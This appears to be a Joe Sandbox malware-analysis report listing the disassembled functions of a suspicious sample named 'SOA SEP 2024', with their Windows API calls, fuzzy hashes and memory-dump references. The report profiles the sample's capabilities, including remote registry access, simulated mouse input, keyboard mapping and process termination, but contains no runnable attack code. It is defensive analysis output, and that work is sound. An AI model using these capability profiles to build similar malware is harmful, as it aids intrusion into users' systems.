Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
String ID:
API String ID: 1380811348-0
Opcode ID: 9a2d41a7d4448fe311d1b8fb1c3845ca0907d7968de1b03bc3ffb1814d4857c3
Instruction ID: 3c2b8c733adb792dc407cbf08fa8e3968b85a03312f1a00207dd7a27a73a8bf5
Opcode Fuzzy Hash: 9a2d41a7d4448fe311d1b8fb1c3845ca0907d7968de1b03bc3ffb1814d4857c3
Instruction Fuzzy Hash: F9514DB1504340DFD721EF24C885EABB7ECEF88754F40492EF98A97251EB749905CBA2

Function 007C2FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON

Download Yara Rule

APIs

Part of subcall function 007C3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007C2BB5,?,?), ref: 007C3C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007C30AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007C30EF
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 007C3112
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 007C313B
RegCloseKey.ADVAPI32(?,?,00000000), ref: 007C317E
RegCloseKey.ADVAPI32(00000000), ref: 007C318B

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 3451389628-0
Opcode ID: 4a56b22e30fa9628960b94688228257b75ce76369cacdc8597dc98996dda0304
Instruction ID: 18ae8073a0028ca52eb926dec433c83451bdc774eba6e9cc65b88097cb1fde88
Opcode Fuzzy Hash: 4a56b22e30fa9628960b94688228257b75ce76369cacdc8597dc98996dda0304
Instruction Fuzzy Hash: 90516B32614344EFC710EF64C889E6AB7E9FF89300F04891DF98687291DB79EA05CB52

Function 007C84DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 007C8540
GetMenuItemCount.USER32(00000000), ref: 007C8577
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 007C859F
GetMenuItemID.USER32(?,?), ref: 007C860E
GetSubMenu.USER32(?,?), ref: 007C861C
PostMessageW.USER32(?,00000111,?,00000000), ref: 007C866D

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 03e13aa2f3926a292bb98e21e03e6372d098cf5c08ffc1b74b77e318cd084b27
Instruction ID: bd86e4511945f6ec3698118634b2443b51081d1495ca8deac3d0dd663d4f5c4b
Opcode Fuzzy Hash: 03e13aa2f3926a292bb98e21e03e6372d098cf5c08ffc1b74b77e318cd084b27
Instruction Fuzzy Hash: 3C519B31A00214EFCF51EFA4C885AAEB7F4EF48310F14845DE916BB352DB78AE418B95

Function 007A4AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007A4B10
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007A4B5B
IsMenu.USER32(00000000), ref: 007A4B7B
CreatePopupMenu.USER32 ref: 007A4BAF
GetMenuItemCount.USER32(000000FF), ref: 007A4C0D
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 007A4C3E

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: bb05653847dca98cfba9e3673d2b7d28ae4e77ebd02cca373d8b202e9268014c
Instruction ID: 95810a45c930765ff6af6dcfe9b2ba27a971e2ce522ac2225e6a253ff3c94f6d
Opcode Fuzzy Hash: bb05653847dca98cfba9e3673d2b7d28ae4e77ebd02cca373d8b202e9268014c
Instruction Fuzzy Hash: CA51C470601249EFDF24CF64D888BADBBF4AFC6324F144259E4299B291D3FAD944CB61

Function 007B8DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,007FDC00), ref: 007B8E7C
WSAGetLastError.WSOCK32(00000000), ref: 007B8E89
__WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 007B8EAD
#16.WSOCK32(?,?,00000000,00000000), ref: 007B8EC5
_strlen.LIBCMT ref: 007B8EF7
WSAGetLastError.WSOCK32(00000000), ref: 007B8F6A

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: ErrorLast$_strlenselect
String ID:
API String ID: 2217125717-0
Opcode ID: 11fa034fe4841e49c53544bdde79a9baff866ee2e058c3e80afab6e86cf6c30a
Instruction ID: b95c06f5e658142b3e5b6a113031a26fc074f3bba1767a456c99a228275f46cf
Opcode Fuzzy Hash: 11fa034fe4841e49c53544bdde79a9baff866ee2e058c3e80afab6e86cf6c30a
Instruction Fuzzy Hash: B3418E71600104EFCB54EBA4CD99FEEB7BEAB58310F104659F51A97291DF38AE40CB61

Function 0077ABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 0077B34E: GetWindowLongW.USER32(?,000000EB), ref: 0077B35F

BeginPaint.USER32(?,?,?), ref: 0077AC2A
GetWindowRect.USER32(?,?), ref: 0077AC8E
ScreenToClient.USER32(?,?), ref: 0077ACAB
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0077ACBC
EndPaint.USER32(?,?,?,?,?), ref: 0077AD06
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 007DE673

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
String ID:
API String ID: 2592858361-0
Opcode ID: 93ba71b5253bb7bfd430f66a339814c6bef1090c57f882bc1d8a0bbaa5f10c05
Instruction ID: c95cc02e21bee15a667c5f29af178fcfd92c1f0f341b22f93ccc598b9d039431
Opcode Fuzzy Hash: 93ba71b5253bb7bfd430f66a339814c6bef1090c57f882bc1d8a0bbaa5f10c05
Instruction Fuzzy Hash: A141D671104301AFDB21DF24CC88F7A7BB8FB69360F148669F9588B2A1C3399C45DB62

Function 007CE397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00821628,00000000,00821628,00000000,00000000,00821628,?,007DDC5D,00000000,?,00000000,00000000,00000000,?,007DDAD1,00000004), ref: 007CE40B
EnableWindow.USER32(00000000,00000000), ref: 007CE42F
ShowWindow.USER32(00821628,00000000), ref: 007CE48F
ShowWindow.USER32(00000000,00000004), ref: 007CE4A1
EnableWindow.USER32(00000000,00000001), ref: 007CE4C5
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 007CE4E8

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 74f9a87a8f5914f70f138f8ff812789189488c3a424e4dfe1aa854c850730183
Instruction ID: 88175946f9ee767ff6d7e0d75accbfc32b060f9d99656d3ddc71b262812cecb0
Opcode Fuzzy Hash: 74f9a87a8f5914f70f138f8ff812789189488c3a424e4dfe1aa854c850730183
Instruction Fuzzy Hash: 77413D34601181EFDB2ACF24C499FA47BE1BB09304F5881ADFA598F2A2C779AD41CB51

Function 007A98BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 007A98D1

Part of subcall function 0077F4EA: std::exception::exception.LIBCMT ref: 0077F51E
Part of subcall function 0077F4EA: __CxxThrowException@8.LIBCMT ref: 0077F533

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 007A9908
EnterCriticalSection.KERNEL32(?), ref: 007A9924
LeaveCriticalSection.KERNEL32(?), ref: 007A999E
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 007A99B3
InterlockedExchange.KERNEL32(?,000001F6), ref: 007A99D2

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 2537439066-0
Opcode ID: 6376fcab5a652730fcfbfc3e051885cbf4f83536df8eae533f2267268bb9a010
Instruction ID: 40fae6a6ec05176ba88e3a54058780f8fa3756f5f22bb086ee4c52a3b763803d
Opcode Fuzzy Hash: 6376fcab5a652730fcfbfc3e051885cbf4f83536df8eae533f2267268bb9a010
Instruction Fuzzy Hash: 87315031A00105EBDF109F94DD89AABB7B8FF85310B1481A9F904AB246D778DE10DBA5

Function 007B9B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,007B77F4,?,?,00000000,00000001), ref: 007B9B53

Part of subcall function 007B6544: GetWindowRect.USER32(?,?), ref: 007B6557

GetDesktopWindow.USER32 ref: 007B9B7D
GetWindowRect.USER32(00000000), ref: 007B9B84
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 007B9BB6

Part of subcall function 007A7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007A7AD0

GetCursorPos.USER32(?), ref: 007B9BE2
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 007B9C44

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: b61359fdb784556f6eaa1829ca55891e59f4edb782c33c21ad504d294d96f395
Instruction ID: eba73b26aa120423ac4316aa75aff7d16ab815a68bf5b2dd47b8850732307ecb
Opcode Fuzzy Hash: b61359fdb784556f6eaa1829ca55891e59f4edb782c33c21ad504d294d96f395
Instruction Fuzzy Hash: 7031E172204355ABC720DF18DC89F9BB7E9FF89314F00092AF695DB181D635E914CB92

Function 0079AF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0079AFAE
OpenProcessToken.ADVAPI32(00000000), ref: 0079AFB5
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0079AFC4
CloseHandle.KERNEL32(00000004), ref: 0079AFCF
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0079AFFE
DestroyEnvironmentBlock.USERENV(00000000), ref: 0079B012

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 7ffd747882bf996cf0f3f3791113cadddc49a16b57050cfbce732214ee981800
Instruction ID: a27ad661fa82301968f7a8de56a0dfdd0f5ad26e0c5ac9b6413e50c4ecc264ed
Opcode Fuzzy Hash: 7ffd747882bf996cf0f3f3791113cadddc49a16b57050cfbce732214ee981800
Instruction Fuzzy Hash: 67215072102249FFDF118F98ED49F9E7BA9EF48304F148015F901A6161C37ADD11DBA1

Function 007CEBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 0077AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0077AFE3
Part of subcall function 0077AF83: SelectObject.GDI32(?,00000000), ref: 0077AFF2
Part of subcall function 0077AF83: BeginPath.GDI32(?), ref: 0077B009
Part of subcall function 0077AF83: SelectObject.GDI32(?,00000000), ref: 0077B033

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 007CEC20
LineTo.GDI32(00000000,00000003,?), ref: 007CEC34
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 007CEC42
LineTo.GDI32(00000000,00000000,?), ref: 007CEC52
EndPath.GDI32(00000000), ref: 007CEC62
StrokePath.GDI32(00000000), ref: 007CEC72

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: da3b5c016d29d854c893918f5a9ccfe02fcd862211c6628bc30dbbaae78bf4c7
Instruction ID: 4d4fdecd359f15a620a67da0ec8e1d962cfa2c5bf44ef2f493ecfef6203f0ed0
Opcode Fuzzy Hash: da3b5c016d29d854c893918f5a9ccfe02fcd862211c6628bc30dbbaae78bf4c7
Instruction Fuzzy Hash: 9611097200114DBFEF229F90DC88EEA7F6DEB08360F048126BE089A160D7759D55DBA0

Function 0079E19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0079E1C0
GetDeviceCaps.GDI32(00000000,00000058), ref: 0079E1D1
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0079E1D8
ReleaseDC.USER32(00000000,00000000), ref: 0079E1E0
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0079E1F7
MulDiv.KERNEL32(000009EC,?,?), ref: 0079E209

Part of subcall function 00799AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00799A05,00000000,00000000,?,00799DDB), ref: 0079A53A

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: CapsDevice$ExceptionRaiseRelease
String ID:
API String ID: 603618608-0
Opcode ID: 76865ac9d768429dd2ffbba439ac70c380091e01f1b9623c5f91ecf3b19f7da5
Instruction ID: 1ccb44740aeed508e8848f73f5aa7714eea606ab3bb306bfc2aead43205e40b2
Opcode Fuzzy Hash: 76865ac9d768429dd2ffbba439ac70c380091e01f1b9623c5f91ecf3b19f7da5
Instruction Fuzzy Hash: BE0184B5A40258BFEF109BA59C45B5EBFB9EB48351F048066EA04AB290D6759C00CBA0

Function 00787B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00787B47

Part of subcall function 0078123A: __initp_misc_winsig.LIBCMT ref: 0078125E
Part of subcall function 0078123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00787F51
Part of subcall function 0078123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00787F65
Part of subcall function 0078123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00787F78
Part of subcall function 0078123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00787F8B
Part of subcall function 0078123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00787F9E
Part of subcall function 0078123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00787FB1
Part of subcall function 0078123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00787FC4
Part of subcall function 0078123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00787FD7
Part of subcall function 0078123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00787FEA
Part of subcall function 0078123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00787FFD
Part of subcall function 0078123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00788010
Part of subcall function 0078123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00788023
Part of subcall function 0078123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00788036
Part of subcall function 0078123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00788049
Part of subcall function 0078123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0078805C
Part of subcall function 0078123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0078806F

__mtinitlocks.LIBCMT ref: 00787B4C

Part of subcall function 00787E23: InitializeCriticalSectionAndSpinCount.KERNEL32(0081AC68,00000FA0,?,?,00787B51,00785E77,00816C70,00000014), ref: 00787E41

__mtterm.LIBCMT ref: 00787B55

Part of subcall function 00787BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00787B5A,00785E77,00816C70,00000014), ref: 00787D3F
Part of subcall function 00787BBD: _free.LIBCMT ref: 00787D46
Part of subcall function 00787BBD: DeleteCriticalSection.KERNEL32(0081AC68,?,?,00787B5A,00785E77,00816C70,00000014), ref: 00787D68

__calloc_crt.LIBCMT ref: 00787B7A
GetCurrentThreadId.KERNEL32 ref: 00787BA3

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
String ID:
API String ID: 2942034483-0
Opcode ID: 90486ad284bf1bdd111c4f06923624b795f2baed0ff29a253a5ca1e5a31deebc
Instruction ID: 276dabc6369ec61c9ae7cca2960c883d83170183999b0f6dfb351851938fe09a
Opcode Fuzzy Hash: 90486ad284bf1bdd111c4f06923624b795f2baed0ff29a253a5ca1e5a31deebc
Instruction Fuzzy Hash: 38F096B21DD75199E62C77347C0AA4A2B859F01730B3046A9F866C50D1FF2CCC42C365

Function 007627EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 0076281D
MapVirtualKeyW.USER32(00000010,00000000), ref: 00762825
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00762830
MapVirtualKeyW.USER32(000000A1,00000000), ref: 0076283B
MapVirtualKeyW.USER32(00000011,00000000), ref: 00762843
MapVirtualKeyW.USER32(00000012,00000000), ref: 0076284B

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 7ddaa800ab54d8d1f6f5e2d5cc63a133c706b9d1a1ea3be12d8d833b0c599d8f
Instruction ID: 771e750d900aaf5ae18243bc18f30faa27badc28f2ff2ccec79d25401db6ab94
Opcode Fuzzy Hash: 7ddaa800ab54d8d1f6f5e2d5cc63a133c706b9d1a1ea3be12d8d833b0c599d8f
Instruction Fuzzy Hash: 2E016CB0902B597DE3008F6A8C85B52FFA8FF19354F00411B915C47941C7F5A864CBE5

Function 007A9AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 1423608774-0
Opcode ID: 4ff1f16c54493a0cc0e20582713a3f192c8e2ccab9e23692024337feaae5c081
Instruction ID: 81e1acea323c4b4edf0e1b47b12fdca44c8a9d02a085c0ac746075674941d2f4
Opcode Fuzzy Hash: 4ff1f16c54493a0cc0e20582713a3f192c8e2ccab9e23692024337feaae5c081
Instruction Fuzzy Hash: 8D018132203221EBDB251B58EC88DEB7769FFCD701B04862AF7039A0A0DB6D9C10DB55

Function 007A7BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 007A7C07
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 007A7C1D
GetWindowThreadProcessId.USER32(?,?), ref: 007A7C2C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007A7C3B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007A7C45
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007A7C4C

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
